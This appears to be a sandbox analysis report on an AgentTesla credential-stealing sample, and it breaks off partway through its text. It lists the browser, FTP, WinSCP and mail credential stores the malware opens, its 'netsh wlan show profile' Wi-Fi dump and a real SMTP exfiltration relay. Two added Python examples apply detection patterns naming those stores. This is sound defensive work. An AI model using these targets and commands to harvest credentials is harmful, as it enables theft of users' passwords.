                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\sample2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\sample2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Note that the only netsh invocation observed is 'netsh wlan show profile', which lists the saved WLAN profiles and changes no firewall or interface setting; this signature fires on the use of netsh by the sample, not on an observed configuration change.

Stealing of Sensitive Information:

Yara detected AgentTesla
• Yara match | File source: 00000012.00000002.991842162.0000000002D70000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 00000012.00000002.991287271.0000000002C14000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 0000000B.00000002.996705258.0000000003454000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 00000001.00000002.987520387.0000000000402000.00000040.00000001.sdmp | type: MEMORY
• Yara match | File source: 0000000A.00000002.721770177.0000000003F4A000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 00000012.00000002.987505021.0000000000402000.00000040.00000001.sdmp | type: MEMORY
• Yara match | File source: 00000001.00000002.996293991.0000000003865000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 00000001.00000002.992160350.0000000003704000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 0000000B.00000002.987543673.0000000000402000.00000040.00000001.sdmp | type: MEMORY
• Yara match | File source: 0000000F.00000002.737377613.000000000416B000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: 0000000B.00000002.993193122.00000000032F8000.00000004.00000001.sdmp | type: MEMORY
• Yara match | File source: Process Memory Space: sample2.exe PID: 7104 | type: MEMORY
• Yara match | File source: Process Memory Space: sample2.exe PID: 5652 | type: MEMORY
• Yara match | File source: Process Memory Space: nwama.exe PID: 6508 | type: MEMORY
• Yara match | File source: Process Memory Space: nwama.exe PID: 6592 | type: MEMORY
• Yara match | File source: Process Memory Space: nwama.exe PID: 5848 | type: MEMORY
• Yara match | File source: Process Memory Space: nwama.exe PID: 7068 | type: MEMORY
• Yara match | File source: 1.2.sample2.exe.400000.0.unpack | type: UNPACKEDPE
• Yara match | File source: 18.2.nwama.exe.400000.0.unpack | type: UNPACKEDPE
• Yara match | File source: 11.2.nwama.exe.400000.0.unpack | type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
• Source: C:\Users\user\Desktop\sample2.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions (2 occurrences)

Tries to harvest and steal WLAN passwords
• Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile (3 occurrences)
• Source: C:\Users\user\Desktop\sample2.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile (2 occurrences)

Tries to harvest and steal browser information (history, passwords, etc)
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to harvest and steal ftp login credentials
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to steal Mail credentials (via file access)
• Source: C:\Users\user\Desktop\sample2.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 occurrences)
• Source: C:\Users\user\Desktop\sample2.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
• Source: C:\Users\user\Desktop\sample2.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 occurrences)
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 occurrences)
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
• Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
• Yara match | File source: Process Memory Space: sample2.exe PID: 5652 | type: MEMORY
• Yara match | File source: Process Memory Space: nwama.exe PID: 6592 | type: MEMORY
• Yara match | File source: Process Memory Space: nwama.exe PID: 7068 | type: MEMORY
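The behaviours listed in this section are individually noisy (an administrator also runs `netsh wlan show profile`; a mail client also opens its own profile) but together they form the AgentTesla credential-harvesting pattern: the same process dumps Wi-Fi profiles, touches several credential stores and then talks SMTP. The correlation below is an added example written by the editor, not Joe Sandbox code. It runs over constructed Sysmon-style event records modelled on the paths, keys and command lines above; the event records, the SMTP port 587 (the report lists only the relay IP) and the shell and mail-client allowlists are assumptions for the example, not values taken from the report.

```python
"""Correlate the credential-theft behaviours a sandbox report lists.

Editor's example, not Joe Sandbox code. The events are constructed
Sysmon-style records modelled on this report's observations.
"""
import re
from collections import defaultdict

# Allowlists are assumptions for this example, not values from the report.
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SMTP_PORTS = {25, 465, 587}

# Registry keys and files the report shows being opened (regex over the full path).
CRED_STORE_RE = re.compile("|".join([
    r"\\WinSCP 2\\Sessions$",
    r"\\Windows Messaging Subsystem\\Profiles\\",
    r"\\IncrediMail\\Identities$",
    r"\\Google\\Chrome\\User Data\\[^\\]+\\(Login Data|Cookies)$",
    r"\\(Mozilla\\Firefox|Thunderbird)\\profiles\.ini$",
    r"\\FileZilla\\recentservers\.xml$",
    r"\\SmartFTP\\Client [^\\]+\\Favorites\\",
]), re.IGNORECASE)
WLAN_PROFILE_RE = re.compile(r"\bwlan\s+show\s+profiles?\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Map one event to a detection category, or None if it is uninteresting."""
    if ev["type"] == "ProcessCreate":
        # netsh dumping Wi-Fi profiles, launched by something other than a user shell
        if (basename(ev["child"]) == "netsh.exe"
                and WLAN_PROFILE_RE.search(ev["cmdline"])
                and basename(ev["image"]) not in INTERACTIVE_SHELLS):
            return "wlan_profile_dump"
    elif ev["type"] in ("RegOpen", "FileOpen"):
        if CRED_STORE_RE.search(ev["target"]):
            return "cred_store_access"
    elif ev["type"] == "NetworkConnect":
        if ev["dport"] in SMTP_PORTS and basename(ev["image"]) not in MAIL_CLIENTS:
            return "smtp_from_non_mail_client"
    return None


def findings(events):
    """pid -> (image, sorted list of categories that process triggered)."""
    per_pid = defaultdict(lambda: {"image": None, "cats": set()})
    for ev in events:
        cat = classify(ev)
        if cat:
            per_pid[ev["pid"]]["image"] = ev["image"]
            per_pid[ev["pid"]]["cats"].add(cat)
    return {pid: (r["image"], sorted(r["cats"])) for pid, r in per_pid.items()}


def alerts(events, min_categories=2):
    """Processes hitting at least min_categories distinct categories: one hit
    is noise, the combination is the infostealer pattern."""
    return sorted((pid, image, cats) for pid, (image, cats) in findings(events).items()
                  if len(cats) >= min_categories)


SAMPLE = r"C:\Users\user\Desktop\sample2.exe"
DROPPED = r"C:\Users\user\AppData\Local\Temp\nwama\nwama.exe"
NETSH = r"C:\Windows\SysWOW64\netsh.exe"

# Constructed events modelled on the report (PIDs 7104 and 6592 appear in it).
EVENTS = [
    {"type": "ProcessCreate", "pid": 7104, "image": SAMPLE, "child": NETSH, "cmdline": "netsh wlan show profile"},
    {"type": "RegOpen", "pid": 7104, "image": SAMPLE,
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"type": "FileOpen", "pid": 7104, "image": SAMPLE, "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"type": "NetworkConnect", "pid": 7104, "image": SAMPLE, "dst": "208.91.198.143", "dport": 587},  # port assumed
    {"type": "FileOpen", "pid": 6592, "image": DROPPED,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "FileOpen", "pid": 6592, "image": DROPPED, "target": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"type": "ProcessCreate", "pid": 6592, "image": DROPPED, "child": NETSH, "cmdline": "netsh wlan show profile"},
    # Benign controls: an admin running netsh from cmd.exe, and a real mail client on SMTP.
    {"type": "ProcessCreate", "pid": 4242, "image": r"C:\Windows\System32\cmd.exe",
     "child": r"C:\Windows\System32\netsh.exe", "cmdline": "netsh wlan show profile"},
    {"type": "NetworkConnect", "pid": 5100, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dst": "203.0.113.25", "dport": 587},
]

if __name__ == "__main__":
    for pid, image, cats in alerts(EVENTS):
        print(pid, image, cats)
```

With the constructed events, both sample PIDs are raised (7104 on all three categories, 6592 on two) while the cmd.exe and Outlook controls produce no finding at all. In production the same logic would key on Sysmon event IDs 1, 3, 11 and 12/13 rather than these dictionaries.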

Remote Access Functionality:

Yara detected AgentTesla
• The same 21 Yara matches listed under Stealing of Sensitive Information above (12 memory dumps, 6 process memory spaces, 3 unpacked PE files).

Mitre Att&ck Matrix

The matrix is reproduced one tactic per line. Digits in square brackets after a technique name are the report's per-technique signature-count badges, copied as printed; techniques without a badge are the matrix's template entries that no signature matched.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [111]; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Registry Run Keys / Startup Folder [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Access Token Manipulation [1]; Process Injection [112]; Registry Run Keys / Startup Folder [1]; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [13]; Masquerading [1]; Virtualization/Sandbox Evasion [3]; Access Token Manipulation [1]; Process Injection [112]; Hidden Files and Directories [1]
Credential Access: OS Credential Dumping [2]; Input Capture [111]; Credentials in Registry [1]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Information Discovery [114]; Query Registry [1]; Security Software Discovery [211]; Virtualization/Sandbox Evasion [3]; Process Discovery [2]; Remote System Discovery [1]; Network Sniffing; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [111]; Clipboard Data [1]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [2]; Non-Standard Port [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [111]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

Behavior Graph ID: 339443
Sample: sample2.bin
Start date: 14/01/2021
Architecture: WINDOWS
Score: 100

The graph is rendered below as a process tree. Numbers in square brackets are the graph's own node IDs; a number after a process name is the registry-value/file-count badge shown on that node, reproduced as printed.

Signatures attached to the root node [2]:
• [47] Found malware configuration
• [49] Antivirus / Scanner detection for submitted sample
• [51] Sigma detected: Capture Wi-Fi password
• [53] 9 other signatures

[2] start
+-- [8] sample2.exe (badge 3) started
|     dropped [41] C:\Users\user\AppData\...\sample2.exe.log, ASCII
|     [69] Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
|     [71] Injects a PE file into a foreign processes
|     +-- [16] sample2.exe (badges 2, 12) started
|           [43] us2.smtp.mailhostbox.com 208.91.198.143, 49760, 49761, 49767, PUBLIC-DOMAIN-REGISTRYUS, United States
|           dropped [37] C:\Users\user\AppData\Local\...\nwama.exe, PE32
|           dropped [39] C:\Users\user\...\nwama.exe:Zone.Identifier, ASCII
|           [55] Tries to harvest and steal WLAN passwords
|           [57] Hides that the sample has been downloaded from the Internet (zone.identifier)
|           [59] Installs a global keyboard hook
|           +-- [25] netsh.exe (badge 3) started
|                 +-- [31] conhost.exe started
+-- [12] nwama.exe (badge 3) started
|     [73] Antivirus detection for dropped file
|     [75] Multi AV Scanner detection for dropped file
|     +-- [21] nwama.exe (badge 9) started
|           [45] 192.168.2.1 unknown unknown
|           +-- [27] netsh.exe started
|                 +-- [33] conhost.exe started
+-- [14] nwama.exe (badge 2) started
      +-- [23] nwama.exe started
            [61] Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            [63] Tries to steal Mail credentials (via file access)
            [65] Tries to harvest and steal ftp login credentials
            [67] Tries to harvest and steal browser information (history, passwords, etc)
            +-- [29] netsh.exe started
                  +-- [35] conhost.exe started

Screenshots

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
sample2.exe | 30% | Metadefender |
sample2.exe | 81% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
sample2.exe | 100% | Avira | TR/Kryptik.bkfmg

Dropped Files (the same three verdicts as the initial sample)

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | 100% | Avira | TR/Kryptik.bkfmg
C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | 30% | Metadefender |
C:\Users\user\AppData\Local\Temp\nwama\nwama.exe | 81% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.sample2.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
18.2.nwama.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
11.2.nwama.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

Domains

No Antivirus matches

URLs

Apart from http://eu0j0ejPMgs9.com (listed again under Contacted URLs below), these strings are font-foundry and licence URLs from embedded font metadata, or truncated fragments of them; trailing characters such as "I.TTF", "hly" or "DPlease" are string-carving overrun, not distinct URLs. Where the original table carried three identical "URL Reputation" rows for one URL they are collapsed into a single row.

Source | Detection | Scanner | Label
http://www.fontbureau.comI.TTF | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (3 entries) | safe
http://www.carterandcone.comep | 0% | Avira URL Cloud | safe
http://www.tiro.com. | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation (3 entries) | safe
http://www.fonts.comicx | 0% | Avira URL Cloud | safe
http://www.fontbureau.comuec | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation (3 entries) | safe
http://www.carterandcone.com | 0% | URL Reputation (3 entries) | safe
http://www.sajatypeworks.com | 0% | URL Reputation (3 entries) | safe
http://www.sajatypeworks.comK | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (3 entries) | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (3 entries) | safe
http://fontfabrik.com | 0% | URL Reputation (3 entries) | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (3 entries) | safe
http://www.fontbureau.comM.TTFN | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation (3 entries) | safe
http://www.sandoll.co.krrad | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation (3 entries) | safe
http://www.urwpp.de | 0% | URL Reputation (3 entries) | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation (3 entries) | safe
http://www.sakkal.com | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cnc | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnb | 0% | Avira URL Cloud | safe
http://www.fontbureau.comF | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cnLog | 0% | Avira URL Cloud | safe
http://www.fontbureau.comsivFw | 0% | Avira URL Cloud | safe
http://www.m. | 0% | Avira URL Cloud | safe
http://www.sandoll.co.krt | 0% | Avira URL Cloud | safe
http://eu0j0ejPMgs9.com | 0% | Avira URL Cloud | safe
http://www.tiro.comn | 0% | URL Reputation (3 entries) | safe
http://www.carterandcone.comi | 0% | Avira URL Cloud | safe
http://www.carterandcone.comg | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation (3 entries) | safe
http://www.founder.cT | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation (3 entries) | safe
http://www.carterandcone.comhly | 0% | Avira URL Cloud | safe
http://www.fontbureau.comueS | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (3 entries) | safe
http://www.tiro.comnm. | 0% | Avira URL Cloud | safe
http://www.fontbureau.como | 0% | URL Reputation (3 entries) | safe
http://www.tiro.comm | 0% | Avira URL Cloud | safe
http://www.fontbureau.comalic | 0% | URL Reputation (3 entries) | safe
http://www.founder.com.cn/cns-m | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn) | 0% | Avira URL Cloud | safe
http://eu0j0ejPMgs9.com3853321935-2125563209-4053062332-1002_Classes | 0% | Avira URL Cloud | safe
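Strings carved from process memory overrun into adjacent bytes, so one host shows up as many "URLs" (fontbureau.comI.TTF, fontbureau.comF, fontbureau.comueS) and a scanner verdict of "safe" on each of them says nothing useful. The triage below is an added example written by the editor, not part of the Joe Sandbox report: it trims each carved string back to the longest host prefix ending in a known TLD label, collapses it to a registrable domain, and separates font-foundry and licence hosts from anything worth pivoting on. The input list is a constructed subset of the table above; the foundry allowlist and the minimal TLD list are analyst assumptions, not values from the report.

```python
"""Normalise URL strings carved from memory and separate noise from candidates.

Editor's example, not Joe Sandbox code. CARVED is a constructed subset of
the report's URL table; FOUNDRY_NOISE and KNOWN_TLDS are analyst assumptions.
"""
from urllib.parse import urlsplit

CARVED = [
    "http://www.fontbureau.comI.TTF",
    "http://www.fontbureau.comF",
    "http://www.founder.com.cn/cn/bThe",
    "http://www.founder.cT",
    "http://www.tiro.comn",
    "http://www.tiro.com.",
    "http://www.carterandcone.comhly",
    "http://www.sajatypeworks.comK",
    "http://www.m.",
    "http://eu0j0ejPMgs9.com",
    "http://eu0j0ejPMgs9.com3853321935-2125563209-4053062332-1002_Classes",
    "http://www.apache.org/licenses/LICENSE-2.0",
]

# Assumption: hosts that legitimately sit in the font metadata embedded in .NET
# binaries. Analyst-maintained allowlist, not something the report provides.
FOUNDRY_NOISE = {
    "fontbureau.com", "carterandcone.com", "tiro.com", "sajatypeworks.com",
    "typography.net", "founder.com.cn", "galapagosdesign.com", "fontfabrik.com",
    "goodfont.co.kr", "sandoll.co.kr", "urwpp.de", "zhongyicts.com.cn", "sakkal.com",
    "fonts.com", "jiyu-kobo.co.jp", "apache.org",
}

# Assumption: the TLD labels seen in this sample. Longer labels first so "com"
# is tried before "cn" on a label such as "comn".
KNOWN_TLDS = ("com", "net", "org", "de", "cn", "kr", "jp")


def carved_host(url):
    """Longest host prefix that ends in a known TLD label, lower-cased, or None.

    Scans labels from the right so "www.founder.com.cn" keeps its full suffix
    while "www.fontbureau.comI.TTF" is trimmed to "www.fontbureau.com". A
    hostname label that merely starts with a TLD ("network") would also be
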